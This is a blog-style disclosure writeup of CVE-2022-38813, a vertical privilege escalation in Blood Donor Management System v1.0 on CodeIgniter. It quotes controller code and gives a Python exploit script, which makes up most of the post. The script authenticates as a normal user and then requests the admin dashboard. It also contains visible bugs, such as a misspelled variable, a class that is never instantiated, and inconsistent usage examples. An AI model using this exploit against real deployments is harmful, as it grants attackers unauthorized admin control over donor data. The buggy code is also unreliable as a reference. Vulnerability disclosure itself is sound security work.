Post

Escaping Boundaries - CVE-2022-38813 - Privilege Escalation in Blood Donor Management System Using CodeIgniter v1.0

Posted
By RashidKhan Pathan 3 min read

Description: This writeup unveils a security vulnerability (CVE-2022-38813) discovered in Blood Donor Management System v1.0, powered by CodeIgniter. The flaw allows an authenticated user to elevate privileges from a normal user to an administrator by manipulating the ‘user’ parameter in the URL, leading to unauthorized access and potential data manipulation.

Introduction: Blood Donor Management System, a PHP-based web application utilizing CodeIgniter v1.0, was found to be susceptible to a vertical privilege escalation vulnerability. This writeup details the technical aspects of the vulnerability, the affected components, and provides a Python exploit script for practical demonstration.

Technical Description: The vulnerability stems from improper access restriction in the ‘users.php’ and ‘admin.php’ pages, allowing an authenticated user to modify the ‘user’ parameter in the URL to ‘admin’. This manipulation grants unauthorized access to the admin dashboard, enabling the user to view, modify, and delete user data, manage blood groups, and submit reports.

Affected Components - Source Code:

In ‘users.php’:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

class Dashboard extends CI_Controller
{
    function __construct()
    {
        parent::__construct();
        if (!$this->session->userdata('uid'))
            redirect('user/login');
    }

    public function index()
    {
        $this->load->view('user/dashboard');
    }
}

In ‘admin.php’:

1
2
3
4
5
6
7
8
9

class Dashboard extends CI_Controller
{
    public function index()
    {
        $this->load->model('admin/Dashboard_Model', 'adminn');
        // Additional code for admin dashboard...
        $this->load->view('admin/dashboard', ['totalusercount' => $totalusercount, 'totalbloodgroupcount' => $totalbloodgroupcount]);
    }
}

Exploit: The provided Python script automates the exploitation process. It authenticates a user, then manipulates the ‘user’ parameter in the URL to ‘admin,’ granting access to the admin panel.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65

import argparse
import requests
from termcolor import cprint
import sys
from bs4 import *
color = "green"
cprint("[+] CVE-2022-38813 Authenticated Privilege Escalation in Blood Donor Management System v1.0", color)
cprint("[+] Author: RashidKhan Pathan aka iHexCoder", color)
cprint("[!] Usage: run exploit.py username password payload", color)
cprint("[!] Example: python3 exploit.py admin johndoe@gmail.com Test@123", color)


class PrivilegeEscalation:
    color = "green"

    def __init__(self, username, password, payload):
        self.username = username
        self.password = password
        self.paylaod = payload

    def authentication(self):
        color = "green"
        cprint("[+] Authenticating User", color)
        cprint("[+] Username: " + args.username, color)
        cprint("[+] Password: " + args.password, color)
        cprint("[+] Payload: " + args.payload, color)

        login_url = "http://localhost/blood/user/login"

        data = {
            "email": args.username,
            "password": args.password
        }
        login_response = requests.post(login_url, data=data)

        cprint("[+] Exploiting...Started", color)
        if "/user/login" in login_response.url:
            cprint("[+] Credentials is not Valid", "red")
            sys.exit(1)
        else:
            cprint("[+] Authenticated Successfully as a Normal User ", color)
            cprint("[+] Normal User URL Endpoint " + login_response.url, color)

        url = args.payload
        if args.payload != "admin":
            cprint("[+] Please Add Valid Payload", "red")
            sys.exit(1)

        response = requests.get(f"http://localhost/blood/{url}/dashboard")
        cprint("[+] Exploit Compleated", color)
        cprint("[+] Accessed Admin Panel Successfully " + response.url, color)
        cprint("[+] Copy the URL and Replace with user/dashboard URL with " +  esponse.url, color)
        cprint("[+] After Replacing it You Should see the Bypassed Admin Panel", color)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("username", help="Please Add Username", type=str)
    parser.add_argument("password", help="Please Add Password", type=str)
    parser.add_argument("payload", help="Please Add Password", type=str)
    args = parser.parse_args()

    privilegeEscalation = PrivilegeEscalation
    privilegeEscalation.authentication((args.username, args.password, args.payload))


1
2

# Usage: python3 CVE-2022-38813.py <username> <password> <payload>
# Example: python3 CVE-2022-38813.py johndoe@gmail.com Test@123 admin

Proof of Concept: A video demonstrating the successful exploitation of the vulnerability is provided, showcasing the normal user’s transition to the admin panel.

Watch Video

References:

Discovered & Developed by: RashidKhan Pathan (iHexCoder), 9 September 2022. Twitter: @itRashid

Windows
exploit writing Web Exploitation 0Day
This post is licensed under CC BY 4.0 by the author.